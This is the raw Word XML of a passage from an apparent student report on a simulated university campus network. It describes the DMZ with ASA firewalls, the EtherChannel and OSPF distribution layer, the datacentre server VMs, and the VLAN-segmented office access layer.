        <w:t xml:space="preserve">The Core of the UWTSD LAN is where all the external traffic is routed to and from </w:t>
      </w:r>
      <w:r w:rsidR="006C266B">
        <w:t>remote locations through</w:t>
      </w:r>
      <w:r w:rsidR="009B0BEF">
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidR="006C266B">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> emulated WAN </w:t>
      </w:r>
      <w:r w:rsidR="006C266B">
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> two separate ISP’s</w:t>
      </w:r>
      <w:r w:rsidR="009B0BEF">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to provide </w:t>
      </w:r>
      <w:r w:rsidR="009B0BEF">
        <w:t xml:space="preserve">additional </w:t>
      </w:r>
      <w:r>
        <w:t>redundancy in the event that one of the ISP</w:t>
      </w:r>
      <w:r w:rsidR="006C266B">
        <w:t>’s services</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C266B">
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to fail</w:t>
      </w:r>
      <w:r w:rsidR="009B0BEF">
        <w:t xml:space="preserve"> and/or core router</w:t>
      </w:r>
      <w:r w:rsidR="008206B0">
        <w:t xml:space="preserve"> so that the UWTSD network is highly available. Utilising two ISP’s also provides load balancing of traffic for higher throughput and lower latency at this segment</w:t>
      </w:r>
      <w:r w:rsidR="000C68DA">
        <w:t xml:space="preserve">, where Port Address Translation (PAT) was implemented for internal traffic to access the Internet. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26211FAD" w14:textId="77777777" w:rsidR="006C266B" w:rsidRDefault="006C266B" w:rsidP="00232187">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BEAF196" w14:textId="1FED3C25" w:rsidR="00232187" w:rsidRDefault="006C266B" w:rsidP="00232187">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>The DMZ is also included within this segment</w:t>
      </w:r>
      <w:r w:rsidR="001A4CC1">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to provide security </w:t>
      </w:r>
      <w:r w:rsidR="001A4CC1">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="009B0BEF">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="001A4CC1">
        <w:t xml:space="preserve"> segment</w:t>
      </w:r>
      <w:r w:rsidR="008206B0">
        <w:t>ed partition</w:t>
      </w:r>
      <w:r w:rsidR="001A4CC1">
        <w:t xml:space="preserve"> between incoming Internet traffic </w:t>
      </w:r>
      <w:r w:rsidR="009B0BEF">
        <w:t xml:space="preserve">guests </w:t>
      </w:r>
      <w:r w:rsidR="001A4CC1">
        <w:t>and the UWTSD internal LAN.</w:t>
      </w:r>
      <w:r w:rsidR="009B0BEF">
        <w:t xml:space="preserve"> The guest AP is also included within this segment of the network to provide </w:t>
      </w:r>
      <w:r w:rsidR="009B0BEF">
        <w:t>Internet access only to end clients that are connected</w:t>
      </w:r>
      <w:r w:rsidR="005A1912">
        <w:t xml:space="preserve"> to the outside of the DMZ</w:t>
      </w:r>
      <w:r w:rsidR="009B0BEF">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001A4CC1">
        <w:t xml:space="preserve"> An</w:t>
      </w:r>
      <w:r w:rsidR="00232187">
        <w:t xml:space="preserve"> illustration of this segment can be found in </w:t>
      </w:r>
      <w:r w:rsidR="00232187" w:rsidRPr="00232187">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r w:rsidR="00232187" w:rsidRPr="00232187">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16368562" w14:textId="1A75E7B6" w:rsidR="00232187" w:rsidRDefault="00232187" w:rsidP="00232187">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="170DC6B8" w14:textId="77777777" w:rsidR="00144508" w:rsidRDefault="00144508" w:rsidP="00144508">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74AE24EE" wp14:editId="4E5DB931">
            <wp:extent cx="3251200" cy="1300480"/>
            <wp:effectExtent l="19050" t="19050" r="25400" b="139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111" t="-3831" r="-477" b="-5108"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3251200" cy="130048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3E99DB72" w14:textId="6688C6CB" w:rsidR="00144508" w:rsidRDefault="00144508" w:rsidP="00144508">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: UWTSD; Core and DMZ Segment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71520AD9" w14:textId="05AEFFDB" w:rsidR="000C68DA" w:rsidRDefault="00435A2A" w:rsidP="000C68DA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The DMZ consists of two ASA 5506 hardware </w:t>
      </w:r>
      <w:r w:rsidR="00AA2CB4">
        <w:t>firewalls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that boarder the Internet accessibl</w:t>
      </w:r>
      <w:r w:rsidR="00AA2CB4">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DMZ</w:t>
      </w:r>
      <w:r w:rsidR="00AA2CB4">
        <w:t xml:space="preserve"> extranet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> server farm</w:t>
      </w:r>
      <w:r w:rsidR="008F5C3A">
        <w:t xml:space="preserve"> and the internal UWTSD LAN. The DMZ server farm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hosts the UWTSD external HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00AA2CB4">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
      <w:r w:rsidR="005A1912" w:rsidRPr="005A1912">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A1912">
        <w:t>that contains the UWTSD public website, a reverse proxy server to cloak the IP addresses within the DMZ server to prevent information gathering of the DMZ network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> along with a file server that </w:t>
      </w:r>
      <w:r w:rsidR="00AA2CB4">
        <w:t>contain</w:t>
      </w:r>
      <w:r w:rsidR="008F5C3A">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00AA2CB4">
        <w:t xml:space="preserve"> non critical data for UWTSD students to acces</w:t>
      </w:r>
      <w:r w:rsidR="008F5C3A">
        <w:t>s from home and E-Mail server.</w:t>
      </w:r>
      <w:r w:rsidR="000C68DA">
        <w:t xml:space="preserve"> Static Network Address Translation (NAT) was implemented for Internet access to the DMZ server farm at the core routers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69780054" w14:textId="3BB18B7B" w:rsidR="008F5C3A" w:rsidRDefault="008F5C3A" w:rsidP="00232187">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34B2F5A8" w14:textId="79FCA2B1" w:rsidR="00144508" w:rsidRDefault="008F5C3A" w:rsidP="00232187">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The server farm also contains an application server and additional file server that can only be accessed via a VPN that has also been approved by the Mobile device Management</w:t>
      </w:r>
      <w:r w:rsidR="00E8174E">
        <w:t xml:space="preserve"> (MDM)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E8174E">
        <w:t>relay agent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> along with a reverse proxy server. These additional DMZ services will be further discussed within the </w:t>
      </w:r>
      <w:r w:rsidRPr="00846F41">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cybersecurity Considerations and Implementation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>of this paper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFA6359" w14:textId="77777777" w:rsidR="00654F18" w:rsidRPr="00232187" w:rsidRDefault="00654F18" w:rsidP="00232187">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A2C8FBB" w14:textId="564F5514" w:rsidR="00654B17" w:rsidRDefault="00654B17" w:rsidP="008F5C3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00654B17">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Distribution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00654B17">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Layer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F5C3A">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Internal Datacentre</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053ED3C8" w14:textId="77777777" w:rsidR="008F5C3A" w:rsidRPr="008F5C3A" w:rsidRDefault="008F5C3A" w:rsidP="008F5C3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35F9711C" w14:textId="77777777" w:rsidR="003D6E6A" w:rsidRDefault="008F5C3A" w:rsidP="008F5C3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008F5C3A">
        <w:t xml:space="preserve">This high throughput segment contains 4 layer-3 switches that are configured within a full mesh </w:t>
      </w:r>
      <w:r w:rsidR="003D6E6A">
        <w:t xml:space="preserve">Cisco </w:t>
      </w:r>
      <w:r w:rsidR="00184F59">
        <w:t xml:space="preserve">Port </w:t>
      </w:r>
      <w:r w:rsidR="003D6E6A">
        <w:t>aggregation Control Protocol (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D6E6A">
        <w:t>PagP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D6E6A">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E8174E">
        <w:t>EtherChannel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E8174E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008F5C3A">
        <w:t xml:space="preserve">topology </w:t>
      </w:r>
      <w:r w:rsidR="00E8174E">
        <w:t xml:space="preserve">to provide ultra-high throughput, load balancing and redundancy at this high volume of traffic segment that is the heart of the LAN. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50365ACC" w14:textId="77777777" w:rsidR="003D6E6A" w:rsidRDefault="003D6E6A" w:rsidP="008F5C3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E10BAB2" w14:textId="0FB0F175" w:rsidR="008F5C3A" w:rsidRDefault="00E8174E" w:rsidP="008F5C3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Layer-3 switches are all connected to the internal LAN datacentre </w:t>
      </w:r>
      <w:r w:rsidR="00AA3252">
        <w:t xml:space="preserve">servers </w:t>
      </w:r>
      <w:r w:rsidR="009775D6">
        <w:t xml:space="preserve">within a spine and leaf datacentre architecture </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(the servers within the </w:t>
      </w:r>
      <w:r w:rsidR="00D87B36">
        <w:t>PT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> topology are not connected to all of the distribution switches because there are only two available interfaces within the </w:t>
      </w:r>
      <w:r w:rsidR="00D87B36">
        <w:t>PT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> servers) and each of the access layers within the network topology</w:t>
      </w:r>
      <w:r w:rsidR="003D6E6A">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00AA3252">
        <w:t xml:space="preserve"> an RF-ID physical security door has also been implemented within the datacentre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="008C09E2">
        <w:t xml:space="preserve">All of the Layer-3 devices that were </w:t>
      </w:r>
      <w:r w:rsidR="0062126D">
        <w:t>implemented</w:t>
      </w:r>
      <w:r w:rsidR="008C09E2">
        <w:t xml:space="preserve"> within the </w:t>
      </w:r>
      <w:r w:rsidR="0062126D">
        <w:t xml:space="preserve">UWTSD ‘Smart Campus’ LAN were configured for dynamic routing using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0062126D">
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0062126D">
        <w:t xml:space="preserve"> Interior Gateway Routing Protocol (IGRP) Open </w:t>
      </w:r>
      <w:r w:rsidR="0062126D" w:rsidRPr="004972EB">
        <w:t>Shortest Path First (OSPF). The distribution</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:t xml:space="preserve"> network segment is illustrated within </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="004972EB" w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E44DD8B" w14:textId="77777777" w:rsidR="00AA3252" w:rsidRDefault="00AA3252" w:rsidP="008F5C3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FEBE461" w14:textId="77777777" w:rsidR="00F4755E" w:rsidRDefault="00AF4AC6" w:rsidP="00F4755E">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA3252">
        <w:rPr>
          <w:i/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="179FC06E" wp14:editId="6996607E">
            <wp:extent cx="3180080" cy="1498600"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="254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1429" t="-2474" r="-794" b="-1767"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3180080" cy="14986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4A5B4C5B" w14:textId="115A2CCC" w:rsidR="009775D6" w:rsidRDefault="00F4755E" w:rsidP="00F4755E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:i w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>:UWTSD Datacentre and Distribution layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D14858" w14:textId="12CA069A" w:rsidR="009F79BF" w:rsidRDefault="003D6E6A" w:rsidP="008F5C3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The datacentre contains a virtualised environment Tier-1 hypervisor for maximum efficiency of server hardware and ease of management of services depicted in figure ?? as 5 individual servers;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDCA553" w14:textId="5F9B4137" w:rsidR="003D6E6A" w:rsidRDefault="003D6E6A" w:rsidP="008F5C3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6221C96C" w14:textId="4C0CC9FE" w:rsidR="003D6E6A" w:rsidRDefault="003D6E6A" w:rsidP="008F5C3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="003D6E6A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Security server;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This Virtual Machine (VM) contains AAA, Active Directory (AD</w:t>
      </w:r>
      <w:r w:rsidR="006A0CB3">
        <w:t>), System</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Logging and MDM main console. These servers and their </w:t>
      </w:r>
      <w:r w:rsidR="006A0CB3">
        <w:t xml:space="preserve">applications within the UWTSD smart </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A0CB3">
        <w:t>netwrok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will be discussed in further detail within the </w:t>
      </w:r>
      <w:r w:rsidRPr="00846F41">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cybersecurity Considerations and Implementation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>of this paper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0945FACC" w14:textId="5CB307C6" w:rsidR="003D6E6A" w:rsidRDefault="003D6E6A" w:rsidP="008F5C3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B3E2273" w14:textId="7420EB64" w:rsidR="003D6E6A" w:rsidRDefault="003D6E6A" w:rsidP="008F5C3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="003D6E6A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Dynamic Host Configuration Protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (DHCP)</w:t>
      </w:r>
      <w:r w:rsidRPr="003D6E6A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This </w:t>
      </w:r>
      <w:r w:rsidR="00654F18">
        <w:t>VM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is responsible for autonomously providing and managing the IP addresses to end clients within the internal LAN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C90859" w14:textId="255234CC" w:rsidR="003D6E6A" w:rsidRDefault="003D6E6A" w:rsidP="008F5C3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DC03054" w14:textId="5EB180F9" w:rsidR="003D6E6A" w:rsidRDefault="003D6E6A" w:rsidP="008F5C3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00654F18">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>HTTPS;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This </w:t>
      </w:r>
      <w:r w:rsidR="00654F18">
        <w:t xml:space="preserve">VM is responsible for hosting the internal web server that end clients can access via their web browser to access the university internal website and important internal information/announcements. depending on the AD privileges assigned to the user. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCE19E9" w14:textId="26C4E3C0" w:rsidR="003D6E6A" w:rsidRDefault="003D6E6A" w:rsidP="008F5C3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A620A00" w14:textId="26A59643" w:rsidR="003D6E6A" w:rsidRDefault="00654F18" w:rsidP="008F5C3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00654F18">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Application;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This VM is responsible for hosting large resource intensive applications that students and staff can access from end clients located within the lecture rooms to learn the applications their utilising and carry out their university projects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39824781" w14:textId="55FDFE6C" w:rsidR="00654F18" w:rsidRDefault="00654F18" w:rsidP="008F5C3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C1657EB" w14:textId="4BA6DFF4" w:rsidR="00654F18" w:rsidRDefault="00654F18" w:rsidP="008F5C3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00654F18">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>File;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This VM is responsible for mapping drives from the Storage Area Network (SAN) to end devices where students and staff can access the data stored depending on their user privileges within the network which will also be discussed within the </w:t>
      </w:r>
      <w:r w:rsidRPr="00846F41">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cybersecurity Considerations and Implementation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002541E8">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r>
        <w:t>this paper.</w:t>
      </w:r>
      <w:r w:rsidR="00D87B36">
        <w:t xml:space="preserve"> The SAN is not depicted in </w:t>
      </w:r>
      <w:r w:rsidR="00D87B36" w:rsidRPr="00D87B36">
        <w:rPr>
          <w:i/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>figure ??</w:t>
      </w:r>
      <w:r w:rsidR="00D87B36">
        <w:t xml:space="preserve"> because PT does not support this device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F8A618" w14:textId="0B089D58" w:rsidR="003D6E6A" w:rsidRDefault="003D6E6A" w:rsidP="008F5C3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19C2E068" w14:textId="4D6C0529" w:rsidR="00E8174E" w:rsidRDefault="00D87B36" w:rsidP="008F5C3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Physical security within the datacentre was also implanted to prevent malicious actors physically accessing the network infrastructure utilising Radio Frequency – Identification (RF-ID) technology to access the datacentre.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440EDFFE" w14:textId="77777777" w:rsidR="00D87B36" w:rsidRPr="008F5C3A" w:rsidRDefault="00D87B36" w:rsidP="008F5C3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37B05305" w14:textId="09B3F4E9" w:rsidR="00654B17" w:rsidRDefault="00654B17" w:rsidP="008F5C3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00654B17">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>802.3 Wired LAN Office - Access Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BD58D1" w14:textId="77777777" w:rsidR="00D87B36" w:rsidRPr="00D87B36" w:rsidRDefault="00D87B36" w:rsidP="00D87B36">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C735C2" w14:textId="0EF6FC73" w:rsidR="00D87B36" w:rsidRDefault="00D87B36" w:rsidP="00096C0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D87B36">
        <w:t xml:space="preserve">The office </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">segment that house the University staff that manage the university, consists of a layer-2 access switch, end devices for the various departments that have each been segmented into </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Virtual Local Area Network (VLAN) to create additional broadcast domains at the access layer to prevent bottlenecks and </w:t>
      </w:r>
      <w:r w:rsidR="00D54EF0">
        <w:t>segment the traffic from each of the departments</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for higher throughput</w:t>
      </w:r>
      <w:r w:rsidR="00D54EF0">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00B01893">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D54EF0">
        <w:t>lower latency</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D54EF0">
        <w:t>which also provides</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D54EF0">
        <w:t xml:space="preserve">ease  and efficiency of  network management IoT smart devices have also been utilised within this segment of the network depicted in </w:t>
      </w:r>
      <w:r w:rsidR="00D54EF0" w:rsidRPr="00D54EF0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r w:rsidR="00D54EF0" w:rsidRPr="00D54EF0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE6D452" w14:textId="3B6C22AF" w:rsidR="00D54EF0" w:rsidRDefault="00D54EF0" w:rsidP="00D87B36">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35243D90" w14:textId="77777777" w:rsidR="00D54EF0" w:rsidRDefault="00D54EF0" w:rsidP="00096C0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73A7A13A" wp14:editId="3349A6BE">
            <wp:extent cx="3150870" cy="2001520"/>
            <wp:effectExtent l="19050" t="19050" r="11430" b="177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34">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="-1902" t="-767" r="2378" b="1"/>
                    <a:stretch/>
